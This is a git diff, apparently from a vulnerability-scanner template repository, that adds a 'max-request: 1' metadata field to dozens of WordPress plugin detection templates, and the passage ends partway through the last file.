100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2dd0ef57b5..2a4b772078 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: + max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 11942f4fa4..366205085d 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: + max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 87c2aeb4bd..598f08ce88 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: + max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 3696eefbf7..42cdfb4475 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: + max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8bab0a9c3e..a1af263dbd 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: + max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index affd270123..19265f910e 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 1e6a62e23b..c21d414695 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: + max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 980265f531..91c89d0ad8 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: + max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index daf205789d..539d9f7cec 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: + max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 22bfa3ffe2..f4123bb594 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: + max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 88d38e21ed..23a88ea130 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: + max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index ad238445fc..8074ac337e 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: + max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 840c086fb9..575c9ebe67 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: + max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2678f603c6..7b0f188ff7 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: + max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 20d947a5d1..898e4de56d 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: + max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 22ee97b51f..4a76856a69 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: + max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 3f4c6c8936..b321ca63eb 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: + max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index fa1bb64115..2b42c9f80c 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: + max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index a8eca7b056..2409c6b370 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-and-footer-scripts/ metadata: + max-request: 1 plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index da63d1cbf6..dbea07a6da 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: + max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f94e7f6494..17a8f220cf 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: + max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 95d2aa5f16..956a08b32d 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: + max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index af8193b875..5a570b9077 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: + max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8d7e45818b..4ecac0cd92 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: + max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ed3967db7b..e50f58cef8 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: + max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 2ff5adba86..031bb48563 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: + max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9099f3c0a5..3cdcf3da93 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: + max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 1ee0e67542..c222bc9d4a 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: + max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 43cb2ab09c..c8acf8c625 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: + max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7ba81036cf..66b7d6a363 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: + max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 24fc3e3295..a36016562d 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: + max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e701e365ba..e4017b1a0a 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: + max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index c0cc5400a8..53d6d393bd 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: + max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 22687bcffe..c286e9a14f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: + max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b69d3d5bfe..364e3cd71e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: + max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 7975a57702..4fcccbfc33 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ff4cef94d7..3fbc714d3b 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a8903697b0..c49b506979 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: + max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 3f141c4476..dfcaf6f71b 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: + max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 5355e988a2..61be246fee 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: + max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 6f06b49011..1c16a72d76 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: + max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 53d409fb68..50d2e6630b 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0e908a9580..8d71f7bde9 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index aeb1875c57..5e1f97086e 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: + max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 7c15702305..d87d456a8c 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: + max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 5ce87e6c71..aa9153241e 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: + max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c342e6b45a..09641796a3 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: + max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index e95041f555..28b70d09bf 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: + max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 879a0d1c12..b43c10ed7a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: + max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 985f5d373a..eb7e78bc7f 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: + max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 8e1cb46cf0..8881e23860 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: + max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7e3e4e2d7e..7a58c58f63 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: + max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 17ea142c46..5f99b8cac8 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: + max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 953e4ab3d8..b08876df04 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: + max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 92107fa69c..3f68dffe06 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: + max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5e1fe4ef5c..34f9bde1d6 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: + max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 74fb3e6010..d9f645328f 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: + max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: 